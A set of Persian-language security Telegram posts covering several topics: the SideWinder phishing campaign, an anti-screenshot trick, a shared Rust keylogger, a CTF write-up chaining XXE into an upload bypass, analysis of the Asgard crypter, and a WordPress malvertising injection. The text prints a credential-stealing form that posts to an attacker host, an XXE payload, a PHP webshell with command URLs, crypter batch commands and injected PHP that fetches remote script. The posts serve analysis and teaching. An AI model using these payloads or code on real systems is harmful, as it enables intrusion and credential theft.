Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
reverse engineering doesn't have to be hard
https://jh.live/hex-rays || Disassemble, decompile and debug with IDA Pro! Use promo code HAMMOND50 for 50% off any IDA Pro product (license discount is only applicable to individuals for any product, not corporations https://hex-rays.com/pricing) and code…
Please open Telegram to view this post
VIEW IN TELEGRAM
ابزاری برای مسدود کردن dllهای ناخواسته موقع اجرای یه برنامه - ارزشمند برای نفوذگرها و رد تیمها
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - dis0rder0x00/obex: Obex – Blocking unwanted DLLs in user mode
Obex – Blocking unwanted DLLs in user mode. Contribute to dis0rder0x00/obex development by creating an account on GitHub.
کمپین جدید SideWinder با هدف سرقت اطلاعات
گروه هکری (APT) SideWinder که یک گروه با حمایت دولتی و سابقه طولانی در عملیاتهای جاسوسی سایبری در جنوب آسیا شناخته میشود، اخیراً کمپین فیشینگ جدیدی را با استفاده از پورتالهای جعلی سرویسهای ایمیل Outlook و Zimbra آغاز کرده است. هدف اصلی این عملیات، سرقت اطلاعات ورود (Credentials) از اهداف حساس دولتی و نظامی است.
جزئیات فنی و تاکتیکهای عملیاتی
1. زیرساخت حمله:
* مهاجمان برای میزبانی صفحات فیشینگ خود از پلتفرمهای هاستینگ رایگان و معتبر مانند Netlify و pages.dev و workers.dev استفاده میکنند. این رویکرد دو مزیت کلیدی برای آنها دارد:
* فرار از مکانیزمهای دفاعی: با استفاده از سرویسهای معتبر، مهاجمان بهراحتی فیلترهای مبتنی بر reputaion دامنه را دور میزنند.
* سرعت عملیاتی بالا : این گروه قادر است بهسرعت دامنههای فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد میشود که این موضوع شناسایی و مسدودسازی آنها را دشوار میکند.
2. روش فریب و طعمهها:
* این گروه از اسناد با مضامین دریایی و دفاعی بهعنوان طعمه برای فریب قربانیان استفاده میکند.
* نمونههای مشخص:
* در بنگلادش، وبسایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتالهایی با عنوان "Secured File" ایجاد گردیده که از قربانیان میخواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.
* در نپال، کارمندان وزارت دارایی ایمیلهایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخستوزیر محترم به چین) دریافت کردهاند که آنها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP:
98.84.224.111 ) هدایت میکند.3. مکانیزم سرقت اطلاعات:
* برخلاف بسیاری از حملات که متکی بر پیلودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرمهای HTML اطلاعات را جمعآوری میکند.
* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست
POST به سرور تحت کنترل مهاجم ارسال میکند. نمونهای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:<form method="POST" action="https://technologysupport.help/1pac.php">
<input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
<label for="email">Email:</label>
<input type="email" id="email" name="user_email" required>
<label for="pass">Password:</label>
<input type="password" id="pass" name="user_pass" required>
<button type="submit">Sign In</button>
</form>
* تحلیل کد:
* یک فیلد مخفی (
hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاریشده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه میدهد تا اطلاعات سرقتشده را با کمپینهای خاص خود مرتبط سازند.* اطلاعات مستقیماً به آدرس
https://technologysupport.help/1pac.php ارسال میشود.4. تکنیکهای تکمیلی و پنهانسازی:
* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده میشود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری میشود. این کار هم به ردیابی نشستها (Session Tracking) کمک میکند و هم تحلیلهای سطحی و سریع را با چالش مواجه میسازد.
* پس از ارسال اطلاعات، ممکن است یک پیغام
reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آنها را وارد کند.اهداف و گستره جغرافیایی
این کمپین بهطور خاص بر روی سازمانهای دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:
* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار
مراحل پس از بهرهبرداری
اطلاعات سرقتشده در فرآیندهای جاسوسی گستردهتر این گروه مورد استفاده قرار میگیرد. این اطلاعات به SideWinder اجازه میدهد تا به شبکههای محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوریهای باز روی سرورهای خود مانند IPهای
47.236.177.123 و 31.14.142.50 مستقر کند.@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Anti-Screen.cpp
5.2 KB
یک کد ساده برای جلوگیری از گرفته شدن اسکرینشات یا ضبط ویدیو از محتوای پنجرهی برنامه که البته کاربردهای دیگهای هم داره :
1. پنهانسازی فعالیت بدافزار: یک بدافزار میتواند رابط کاربری خود (مثلاً یک پنجرهی تنظیمات یا یک فیشینگ پاپآپ) را با این تکنیک محافظت کند. این کار تحلیلگران امنیتی را که از ابزارهای مبتنی بر اسکرینشات یا ضبط ویدیو برای مستندسازی و تحلیل رفتار بدافزار در محیطهای سندباکس استفاده میکنند، با چالش مواجه میکند.
2. جلوگیری از گزارشگیری کاربر: اگر یک بدافزار یک پنجرهی جعلی برای دریافت اطلاعات حساس (مانند رمز عبور) نمایش دهد، استفاده از SetWindowDisplayAffinity میتواند مانع از این شود که کاربر به راحتی از آن پنجره اسکرینشات گرفته و برای تیم پشتیبانی یا امنیتی ارسال کند.
3. دور زدن سیستمهای مانیتورینگ: برخی از سیستمهای نظارت بر فعالیت کاربر (Employee Monitoring) یا ابزارهای (Parental Control) برای رصد فعالیتها به صورت دورهای اسکرینشات میگیرند. یک برنامه مخرب میتواند با این روش خود را از دید این سیستمها پنهان کند.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Keylogger.tar.gz
2 KB
یک کیلاگر نوشته شده با Rust
درود به همه دوستان و اساتید . این سورس کد ساده بدافزار کیلاگر که با زبان برنامهنویسی Rust قبلا به عنوان نمونه نوشته بودم برای لینوکس هست که لاگها رو جمع آوری و به تلگرام میفرسته .
نکاتی داره برای آموزش و یادگیری و البته نقاط ضعفش رو هم نوشتم که بدونید و خودتون جهت یادگیری اصلاحش کنید . مثل :
مشخص بودن مقادیر ربات تلگرام (توکن و آیدی) در سورس کد.
ثبت شدن پیغامهای خطا (eprintln!) در کد.
ثابت بودن مسیر دایرکتوری (/tmp/k-pro-logs) که به راحتی توسط ابزارهای مانیتورینگ فایل قابل شناسایی است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
چالش CTF Anonymous
زنجیرهای از آسیبپذیریها تا اجرای کد از راه دور (RCE)
این چالش یک نمونهی آموزشی عالی از چگونگی زنجیرهای کردن آسیبپذیریها (Vulnerability Chaining) برای دستیابی به بالاترین سطح دسترسی در یک سیستم است. مهاجم با ترکیب هوشمندانه یک آسیبپذیری XML External Entity (XXE) با یک مکانیزم معیوب در بارگذاری فایل، موفق به اجرای کد از راه دور (RCE) میشود. در ادامه، هر مرحله با جزئیات فنی دقیقتر شکافته میشود.
مرحله اول: کشف و بهرهبرداری از آسیبپذیری XXE
حمله با یک آسیبپذیری کلاسیک اما همچنان بسیار خطرناک، یعنی XXE آغاز میشود.
۱. شناسایی نقطه ضعف
تحلیل کد جاوا اسکریپت در سمت کلاینت نشان میدهد که دادههای فرم در قالب یک ساختار **XML به فایل
notify.php ارسال میشوند. این الگو بلافاصله باید زنگ خطر را برای هر متخصص امنیتی به صدا درآورد. هرگاه یک برنامه ورودی کاربر را درون یک سند XML پردازش میکند، پتانسیل حمله XXE وجود دارد، مگر اینکه پردازنده XML به طور صریح و ایمن پیکربندی شده باشد.کد جاوا اسکریپت تابعی را نشان میدهد که یک پیلود XML میسازد و آن را ارسال میکند. این ساختار به مهاجم اجازه میدهد تا کنترل کامل بر محتوای XML ارسالی داشته باشد.
۲. اثبات آسیبپذیری و استخراج اطلاعات
مهاجم با استفاده از ابزاری مانند
cURL ، یک پیلود XML دستکاریشده را ارسال میکند. این پیلود شامل یک External Entity است که به یک فایل محلی روی سرور (/etc/passwd) اشاره میکند.پیلود نمونه:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</user>
<!DOCTYPE user [...]> : این بخش یک Document Type Definition (DTD) را تعریف میکند.
<!ENTITY xxe SYSTEM "file:///etc/passwd"> : این قسمت یک موجودیت (Entity) به نام
xxe تعریف میکند که محتوای آن از فایل /etc/passwd خوانده میشود.&xxe; : در بدنه XML، با فراخوانی این موجودیت، پردازنده XML محتوای فایل را جایگزین آن کرده و در پاسخ به مهاجم برمیگرداند.
موفقیت در خواندن این فایل، آسیبپذیری In-Band XXE را تأیید میکند و نشان میدهد که مهاجم قابلیت خواندن فایلهای دلخواه روی سیستم را با سطح دسترسی کاربر وبسرور (مثلاً
www-data) دارد.مرحله دوم: شناسایی میزبان مخفی و حرکت جانبی (Lateral Movement)
پس از به دست آوردن قابلیت خواندن فایل، مهاجم از این دسترسی برای فاز شناسایی (Enumeration) عمیقتر سیستم استفاده میکند.
۱. خواندن فایلهای پیکربندی
یک هدف کلیدی در این مرحله، فایلهای پیکربندی وبسرور است. در این مورد، فایل
/etc/apache2/sites-enabled/000-default.conf حاوی اطلاعات ارزشمندی است. این فایل پیکربندی Virtual Hosts در آپاچی را تعریف میکند.۲. کشف
anonupload.cyberquestمحتوای این فایل یک میزبان (Host) جدید به نام
anonupload.cyberquest را آشکار میکند که روی همان سرور و آدرس IP میزبانی میشود اما از طریق دامنه اصلی قابل دسترسی نیست. این یک تکنیک رایج برای پنهان کردن پنلهای ادمین یا سرویسهای داخلی است.۳. دسترسی به میزبان جدید
مهاجم با افزودن رکورد زیر به فایل
/etc/hosts سیستم محلی خود، به سیستمعامل خود میآموزد که چگونه دامنه anonupload.cyberquest را به آدرس IP سرور هدف ترجمه کند:35.200.207.70 anonupload.cyberquestاین کار به او اجازه میدهد تا مستقیماً به وبسایت مخفی دسترسی پیدا کند، که در این مورد یک صفحه آپلود فایل محافظتشده با رمز عبور است.
مرحله سوم: دور زدن احراز هویت و تحلیل مکانیزم آپلود
مهاجم مجدداً از همان آسیبپذیری XXE، اما این بار برای یک هدف جدید، استفاده میکند: خواندن کد منبع صفحه آپلود.
۱. استخراج کد منبع و رمز عبور
با ارسال یک پیلود XXE برای خواندن فایل
/var/www/anonupload.cyberquest/index.php ، مهاجم به کد PHP صفحه دسترسی پیدا میکند. تحلیل این کد، رمز عبور supersecret1234564_niceeeee132213 را که به صورت Hardcoded در کد قرار داده شده است، فاش میکند. این یک اشتباه امنیتی بسیار رایج و خطرناک است.۲. ورود به پنل آپلود
پس از ورود، مهاجم با یک فرم آپلود فایل مواجه میشود که دارای چندین لایه امنیتی است. تحلیل این لایهها کلید موفقیت در مرحله نهایی است.
مرحله چهارم: دور زدن پیچیده فیلتر آپلود فایل
این بخش جذابترین و فنیترین قسمت چالش است و یک ضعف کلاسیک در منطق برنامهنویسی را به نمایش میگذارد.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Mr. SAM
۱. تلاشهای اولیه و جمعآوری اطلاعات
* تلاش اول (دور زدن MIME Type): مهاجم یک شل PHP را با هدر
* تلاش دوم (عدم تطابق محتوا و پسوند): مهاجم یک فایل PNG معتبر (با Magic Number صحیح) اما با پسوند
این خطاها اطلاعات ارزشمندی به مهاجم میدهند: هم محتوای فایل باید شبیه یک تصویر مجاز باشد و هم پسوند آن باید در لیست سفید (Whitelist) باشد.
۲. کشف آسیبپذیری کلیدی در منطق PHP
تحلیل مجدد کد
* منطق اعتبارسنجی (معیوب):
این کد نام فایل را بر اساس کاراکتر
* منطق ذخیرهسازی (امن):
در مقابل، برای تعیین پسوند نهایی جهت ذخیرهسازی، کد از تابع امن و استاندارد
این تضاد در منطق، یک حفره امنیتی کلاسیک ایجاد میکند. اعتبارسنجی روی یک بخش از نام فایل (jpeg) انجام میشود، اما فایل با بخش دیگری از نام آن (php) ذخیره میشود.
۳. ساخت پیلود نهایی و دستیابی به RCE
برای موفقیت در آپلود، مهاجم باید هر دو شرط را برآورده کند:
1. دور زدن بررسی محتوا: یک فایل JPEG معتبر ایجاد میکند. سپس با استفاده از ابزاری مانند
2. **دور زدن بررسی پسوند: نام فایل را به
با آپلود این فایل دستکاریشده، تمام لایههای امنیتی دور زده میشوند. فایل به عنوان یک تصویر معتبر با پسوند
۴. اجرای دستور و خواندن پرچم
اکنون مهاجم میتواند از طریق مرورگر به شل آپلود شده دسترسی پیدا کرده و با استفاده از پارامتر
با اجرای دستور
### نتیجه:
این چالش به زیبایی نشان میدهد که چگونه ترکیبی از آسیبپذیریهای به ظاهر جداگانه میتواند منجر به نفوذ کامل شود. راهکارهای مقابله باید به صورت لایهای و جامع پیادهسازی شوند:
1. مقابله با XXE:
* پردازندههای XML باید به گونهای پیکربندی شوند که پردازش External Entities و DTDs به طور کامل غیرفعال باشد. در PHP (با استفاده از کتابخانه libxml)، این کار با دستور زیر قبل از بارگذاری XML انجام میشود:
* تلاش اول (دور زدن MIME Type): مهاجم یک شل PHP را با هدر
Content-Type: image/jpeg آپلود میکند. خطا نشان میدهد که سرور فقط به هدر اکتفا نکرده و محتوای فایل را نیز بررسی میکند. احتمالاً با استفاده از توابعی مانند getimagesize() یا finfo_file() که Magic Numbers (بایتهای اولیه فایل) را بررسی میکنند.* تلاش دوم (عدم تطابق محتوا و پسوند): مهاجم یک فایل PNG معتبر (با Magic Number صحیح) اما با پسوند
.php را آپلود میکند. این تلاش نیز با شکست مواجه میشود، که نشان میدهد سرور به شدت تطابق بین محتوای فایل و پسوند آن را کنترل میکند.این خطاها اطلاعات ارزشمندی به مهاجم میدهند: هم محتوای فایل باید شبیه یک تصویر مجاز باشد و هم پسوند آن باید در لیست سفید (Whitelist) باشد.
۲. کشف آسیبپذیری کلیدی در منطق PHP
تحلیل مجدد کد
index.php ضعف اصلی را آشکار میکند: عدم سازگاری بین منطق اعتبارسنجی و منطق ذخیرهسازی فایل.* منطق اعتبارسنجی (معیوب):
explode(".", $_FILES["fileToUpload"]["name"])[1]این کد نام فایل را بر اساس کاراکتر
. تقسیم (explode) کرده و عنصر دوم (اندیس 1) آرایه را به عنوان پسوند در نظر میگیرد. برای فایلی با نام shell.jpeg.php ، نتیجه این کد jpeg خواهد بود که در لیست پسوندهای مجاز قرار دارد و اعتبارسنجی با موفقیت انجام میشود. این روش برای استخراج پسوند بسیار ناامن و اشتباه است.* منطق ذخیرهسازی (امن):
pathinfo($_FILES["fileToUpload"]["name"], PATHINFO_EXTENSION)
در مقابل، برای تعیین پسوند نهایی جهت ذخیرهسازی، کد از تابع امن و استاندارد
pathinfo() استفاده میکند. این تابع برای نام فایل shell.jpeg.php به درستی پسوند نهایی یعنی php را برمیگرداند.این تضاد در منطق، یک حفره امنیتی کلاسیک ایجاد میکند. اعتبارسنجی روی یک بخش از نام فایل (jpeg) انجام میشود، اما فایل با بخش دیگری از نام آن (php) ذخیره میشود.
۳. ساخت پیلود نهایی و دستیابی به RCE
برای موفقیت در آپلود، مهاجم باید هر دو شرط را برآورده کند:
1. دور زدن بررسی محتوا: یک فایل JPEG معتبر ایجاد میکند. سپس با استفاده از ابزاری مانند
exiftool ، کد شل PHP (<?php system($_GET['cmd']); ?>) را در بخش متادیتا (Metadata)**، مثلاً در قسمت کامنتها، تزریق میکند. این کار باعث میشود فایل همچنان یک تصویر معتبر باقی بماند و از بررسی Magic Number عبور کند، اما حاوی کد مخرب باشد.2. **دور زدن بررسی پسوند: نام فایل را به
shell.jpeg.php تغییر میدهد.با آپلود این فایل دستکاریشده، تمام لایههای امنیتی دور زده میشوند. فایل به عنوان یک تصویر معتبر با پسوند
jpeg شناسایی شده، اما در نهایت با پسوند .php روی سرور ذخیره میشود.۴. اجرای دستور و خواندن پرچم
اکنون مهاجم میتواند از طریق مرورگر به شل آپلود شده دسترسی پیدا کرده و با استفاده از پارامتر
cmd در URL، دستورات دلخواه را بر روی سرور اجرا کند.http://anonupload.cyberquest/uploads/2a9526f0dd3382db.php?cmd=ls -la /http://anonupload.cyberquest/uploads/2a9526f0dd3382db.php?cmd=cat /fl444g_11d854d6a9c9341e8af155128bf74362.txtبا اجرای دستور
cat بر روی فایل پرچم، چالش با موفقیت به پایان میرسد.### نتیجه:
این چالش به زیبایی نشان میدهد که چگونه ترکیبی از آسیبپذیریهای به ظاهر جداگانه میتواند منجر به نفوذ کامل شود. راهکارهای مقابله باید به صورت لایهای و جامع پیادهسازی شوند:
1. مقابله با XXE:
* پردازندههای XML باید به گونهای پیکربندی شوند که پردازش External Entities و DTDs به طور کامل غیرفعال باشد. در PHP (با استفاده از کتابخانه libxml)، این کار با دستور زیر قبل از بارگذاری XML انجام میشود:
libxml_disable_entity_loader(true);
Mr. SAM
۱. تلاشهای اولیه و جمعآوری اطلاعات * تلاش اول (دور زدن MIME Type): مهاجم یک شل PHP را با هدر Content-Type: image/jpeg آپلود میکند. خطا نشان میدهد که سرور فقط به هدر اکتفا نکرده و محتوای فایل را نیز بررسی میکند. احتمالاً با استفاده از توابعی مانند getimagesize()…
2. امنسازی مکانیزم آپلود فایل (بسیار مهم):
* هرگز به نام فایل ارسالی توسط کاربر اعتماد نکنید. پس از آپلود، یک نام فایل کاملاً جدید، تصادفی و بدون پسوند تولید کنید و فایل را با آن نام ذخیره کنید. نام اصلی فایل کاربر را میتوان در پایگاه داده ذخیره کرد.
* استفاده از یک تابع واحد و امن برای بررسی پسوند: همیشه از
* ذخیرهسازی فایلها خارج از Web Root: فایلهای آپلود شده باید در مسیری ذخیره شوند که مستقیماً از طریق URL قابل دسترسی و اجرا نباشد. برای ارائه فایل به کاربر، از یک اسکریپت واسط (Wrapper Script) استفاده کنید که فایل را میخواند و با هدر
* غیرفعالسازی اجرای اسکریپت: اگر مجبور به ذخیره فایلها در Web Root هستید، با استفاده از پیکربندی وبسرور (مثلاً فایل
* پاکسازی محتوا: برای فایلهای تصویری، آنها را پس از آپلود مجدداً با استفاده از یک کتابخانه معتبر (مانند GD یا ImageMagick) پردازش و ذخیره کنید (Image Re-encoding). این کار تمام متادیتای اضافی و بالقوه خطرناک را حذف میکند.
* عدم افشای اطلاعات در پیامهای خطا: پیامهای خطای دقیق مانند "File’s content and it’s extension had to match" به مهاجم سرنخهای ارزشمندی میدهد. خطاها باید عمومی و غیر توصیفی باشند.
نوشته اصلی
@NullError_ir
* هرگز به نام فایل ارسالی توسط کاربر اعتماد نکنید. پس از آپلود، یک نام فایل کاملاً جدید، تصادفی و بدون پسوند تولید کنید و فایل را با آن نام ذخیره کنید. نام اصلی فایل کاربر را میتوان در پایگاه داده ذخیره کرد.
* استفاده از یک تابع واحد و امن برای بررسی پسوند: همیشه از
pathinfo() برای استخراج پسوند استفاده کنید و آن را با یک لیست سفید (Whitelist) از پسوندهای مجاز مقایسه کنید.* ذخیرهسازی فایلها خارج از Web Root: فایلهای آپلود شده باید در مسیری ذخیره شوند که مستقیماً از طریق URL قابل دسترسی و اجرا نباشد. برای ارائه فایل به کاربر، از یک اسکریپت واسط (Wrapper Script) استفاده کنید که فایل را میخواند و با هدر
Content-Type مناسب به کاربر ارسال میکند.* غیرفعالسازی اجرای اسکریپت: اگر مجبور به ذخیره فایلها در Web Root هستید، با استفاده از پیکربندی وبسرور (مثلاً فایل
.htaccess در آپاچی)، اجرای هرگونه اسکریپت (PHP, Perl, etc.) را در پوشه آپلود غیرفعال کنید.<Directory /var/www/html/uploads>
<Files "*.php">
Order Deny,Allow
Deny from all
</Files>
php_flag engine off
</Directory>
* پاکسازی محتوا: برای فایلهای تصویری، آنها را پس از آپلود مجدداً با استفاده از یک کتابخانه معتبر (مانند GD یا ImageMagick) پردازش و ذخیره کنید (Image Re-encoding). این کار تمام متادیتای اضافی و بالقوه خطرناک را حذف میکند.
* عدم افشای اطلاعات در پیامهای خطا: پیامهای خطای دقیق مانند "File’s content and it’s extension had to match" به مهاجم سرنخهای ارزشمندی میدهد. خطاها باید عمومی و غیر توصیفی باشند.
نوشته اصلی
@NullError_ir
Medium
Excel 2025 CTF | “Anonymous” (Miscellaneous) Writeup
The challenge ‘Anoymous’ was one of the interesting challenge in Excel 2025 CTF. It was a miscellaneous challenge and mostly it includes…
Please open Telegram to view this post
VIEW IN TELEGRAM
آسیبپذیری OpenSSH از طریق ProxyCommand برای اجرای کد از راه دور مورد بهرهبرداری قرار گرفت .
PoC Released
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
تحلیل Asgard
با تحلیل دقیق و مهندسی معکوس Asgard، محققان امنیتی به تکنیکهای پیچیده آن برای دور زدن آنتیویروسها و ابزارهای تحلیلی پی بردهاند. این Crypter که از اواخر سال ۲۰۲۳ در فرومهای زیرزمینی تبلیغ شده، به دلیل قابلیتهای پیشرفته در پنهانسازی و استقرار payloadهای مخرب، توجه مهاجمان سایبری را به خود جلب کرده است. در ادامه، جزئیات فنی و مکانیزم عملکرد این بدافزار به صورت کامل تشریح میشود
این Asgard Protector یک ابزار رمزکننده (Crypter) است که توسط مجرمان سایبری برای پنهانسازی و اجرای بدافزارهای دیگر مانند (RATs) و (Infostealers) استفاده میشود. این ابزار با بستهبندی payloadهای مخرب در قالب یک (installer) به ظاهر سالم، مکانیزمهای دفاعی آنتی ویروسهای سنتی را خنثی کرده و فرآیندهای تحلیل و پاسخ به حوادث را با چالش جدی مواجه میکند.
زنجیره آلودگی و مکانیزم عملکرد (Infection Chain)
عملکرد Asgard Protector چندمرحلهای و لایهلایه است تا شناسایی آن تا حد ممکن دشوار شود.
۱. مرحله اولیه: آرشیو خوداستخراج Nullsoft
بدافزار معمولاً در قالب یک فایل آرشیو خوداستخراج Nullsoft (Nullsoft Self-extracting Archive) توزیع میشود. پس از اجرا، این فایل چندین کامپوننت مخفی را در دایرکتوری موقت سیستم (
%TEMP% ) استخراج (unpack) میکند.۲. تکنیکهای پنهانسازی اولیه
یکی از تکنیکهای هوشمندانه در این مرحله، فریب از طریق پسوند فایل است. اسکریپت batch اصلی که وظیفه هدایت عملیات را بر عهده دارد، با پسوندی غیرمرتبط (مانند تغییر نام یک فایل
.bat به Belgium.pst) ذخیره میشود تا از دید تحلیلگران و سیستمهای امنیتی پنهان بماند. علاوه بر این، محتوای خود اسکریپت نیز به شدت مبهمسازی (Obfuscate) شده است.۳. بازسازی مفسر AutoIt در حافظه
اسکریپت نصبکننده، به جای استفاده از یک فایل اجرایی کامل، قطعات یک مفسر AutoIt را از درون فایلهای آرشیو CAB جاسازیشده استخراج کرده و آن را مستقیماً در حافظه (in-memory) بازسازی (reconstruct) میکند. این رویکرد از رها کردن یک فایل اجرایی کامل بر روی دیسک جلوگیری کرده و در نتیجه، از شناسایی مبتنی بر امضا (signature-based detection) فرار میکند.
۴. رمزگشایی و اجرای Payload نهایی
پس از بازسازی مفسر AutoIt، اسکریپت AutoIt جاسازیشده اجرا میشود که خود شامل لایههای حفاظتی بیشتری است:
* رمزگشایی در حافظه: Payload نهایی (بدافزار اصلی) به صورت رمزنگاریشده با الگوریتم RC4 درون اسکریپت ذخیره شده است و تنها در حافظه رم رمزگشایی میشود.
* فشردهسازی: پس از رمزگشایی، باینری با استفاده از الگوریتم LZNT1 از حالت فشرده خارج میشود.
* تزریق فرآیند (Process Injection): در نهایت، payload مخرب به درون یک فرآیند سیستمی معتبر مانند
explorer.exe تزریق میشود. این کار باعث میشود که فعالیت بدافزار در زیر نقاب یک فرآیند قانونی پنهان شده و شناسایی آن در لیست فرآیندهای در حال اجرا بسیار دشوار گردد.تکنیکهای پیشرفته فرار از تحلیل
این Asgard Protector از مکانیزمهای خاصی برای مقابله با محیطهای تحلیل و سندباکس بهره میبرد:
* شناسایی سندباکس مبتنی بر شبکه: یک تکنیک منحصربهفرد در این بدافزار، ارسال درخواست
ping به یک دامنه که به صورت تصادفی تولید شده است، میباشد. اگر هرگونه پاسخی از این دامنه دریافت شود، بدافزار تشخیص میدهد که در یک محیط شبکه شبیهسازیشده یا مانیتور شده (مانند سندباکس) قرار دارد و بلافاصله اجرای خود را متوقف میکند تا از تحلیل شدن جلوگیری نماید.* اجرای بدون فایل (Fileless Execution): ترکیب تکنیکهای بازسازی در حافظه، رمزگشایی و تزریق فرآیند، به Asgard Protector اجازه میدهد تا بدون نوشتن فایل اجرایی نهایی بر روی دیسک، عملیات خود را تکمیل کند و از دید ابزارهای بازرسی مبتنی بر دیسک پنهان بماند.
مکانیزم پایداری (Persistence)
پس از اجرای موفقیتآمیز، بدافزار بسته به پیکربندی اپراتور، از یکی از روشهای زیر برای اطمینان از اجرای مجدد خود پس از راهاندازی سیستم استفاده میکند:
* تغییر کلیدهای رجیستری Autorun: با افزودن ورودیهای جدید به کلیدهای رجیستری مربوط به اجرای خودکار، بدافزار خود را در چرخه بوت سیستمعامل قرار میدهد.
* ایجاد وظایف زمانبندیشده (Scheduled Tasks): بدافزار یک وظیفه زمانبندیشده جدید در سیستم تعریف میکند تا در فواصل زمانی مشخص یا در رویدادهای خاصی مجدداً اجرا شود.
تحلیل عمیق اسکریپت بازسازی
اسکریپت
.bat مبهمسازیشده از ترکیبی از دستورات خط فرمان ویندوز برای بازسازی باینری مفسر AutoIt استفاده میکند. قطعه کد زیر نمونهای از این فرآیند است:Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
findstr /b /r /c:"MZ" *.dat > offset.txt
for /f "tokens=1" %%A in (offset.txt) do set /A start=%%A
certutil -decode input.cab temp.exe
fsutil file createnew stub.bin %start%
more +%start% input.cab >> stub.bin
تحلیل کد:
1۔
findstr /b /r /c:"MZ" *.dat > offset.txt: این دستور در فایلهای با پسوند .dat (که در واقع آرشیو CAB هستند) به دنبال هدر فایلهای اجرایی ویندوز (MZ) میگردد و آفست (موقعیت شروع) آن را در فایل offset.txt ذخیره میکند.2۔
for /f ... set /A start=%%A: مقدار آفست از فایل متنی خوانده شده و در متغیر start ذخیره میشود.3۔
certutil -decode input.cab temp.exe: این بخش احتمالاً برای decode کردن بخشی از فایل استفاده میشود (اگرچه در این سناریو ممکن است کاربرد دیگری داشته باشد).4۔
fsutil file createnew stub.bin %start%: یک فایل خالی به نام stub.bin با اندازهای برابر با مقدار آفست هدر MZ ایجاد میکند.5۔
more +%start% input.cab >> stub.bin: این دستور هوشمندانه، محتوای فایل input.cab را از نقطه شروع هدر MZ به بعد خوانده و به انتهای فایل stub.bin اضافه میکند. نتیجه این عملیات، بازسازی کامل فایل اجرایی مفسر AutoIt از قطعات جاسازیشده است.این مدل بازسازی (piecemeal assembly) و اجرای چندمرحلهای، توانایی بدافزار را برای فرار از موتورهای آنتیویروس مبتنی بر امضا و ابزارهای تحلیل استاتیک به شدت افزایش میدهد.
@NullError_ir
تحلیل کمپین Malvertising در وردپرس:
مهندسی معکوس تکنیکهای پنهانسازی در functions.php
یک کمپین Malvertising (تبلیغات بدافزاری) پیچیده و در عین حال پنهانکار، وبسایتهای وردپرسی را هدف قرار داده است. این کمپین با تزریق یک قطعه کد PHP به ظاهر بیخطر در فایل
functions.php قالب فعال، کنترل کامل بر روی محتوای front-end وبسایت را به دست گرفته و بازدیدکنندگان را در معرض انواع تهدیدات، از جمله هدایتهای اجباری (Forced Redirects) ، نمایش پاپآپهای مخرب و بدافزارهای drive-by قرار میدهد.فاز اول: شناسایی و نقطه نفوذ
حمله زمانی شناسایی شد که صاحبان وبسایت متوجه بارگذاری اسکریپتهای جاوا اسکریپت مشکوک و ناخواستهای شدند که هرگز توسط آنها نصب نشده بود. بررسی سورس صفحه (View Page Source)، سرنخ اولیه را آشکار ساخت: یک تگ
<noscript> که فایلی را از یک دامنه خارجی و ناشناس بارگذاری میکرد.تحقیقات عمیقتر نشان داد که منشأ این تزریق، یک قطعه کد PHP است که به انتهای فایل
functions.php قالب فعال وردپرس اضافه شده است. این فایل به دلیل نقش کلیدی در تعریف عملکردها و ویژگیهای قالب، یک هدف ایدهآل برای مهاجمان است.بردار اصلی نفوذ در این کمپین، اغلب یکی از موارد زیر است:
* آسیبپذیری در افزونهها یا قالبهای قدیمی: مهاجمان با بهرهبرداری از یک آسیبپذیری شناختهشده، دسترسی لازم برای ویرایش فایلهای قالب را به دست میآورند.
* اعتبارنامههای ضعیف یا سرقتشده: استفاده از رمزهای عبور ضعیف برای حساب مدیریت وردپرس، FTP یا کنترل پنل هاستینگ، مسیری مستقیم برای نفوذ فراهم میکند.
* مجوزهای دسترسی (Permissions) نادرست فایلها: اگر فایل
functions.php دارای مجوز نوشتن (writable) برای پروسس وبسرور باشد، بدافزارها میتوانند به راحتی آن را ویرایش کنند.فاز دوم: کالبدشکافی کد تزریقشده
کد تزریقشده در فایل
functions.php به شکل زیر است. سادگی ظاهری این کد، قدرت پنهانکاری آن را افزایش میدهد:// Injected PHP function in functions.php
function ti_custom_javanoscript() {
$response = wp_remote_post(
'https://brazilc.com/ads.php',
array(
'timeout' => 15,
'body' => array('url' => home_url())
)
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
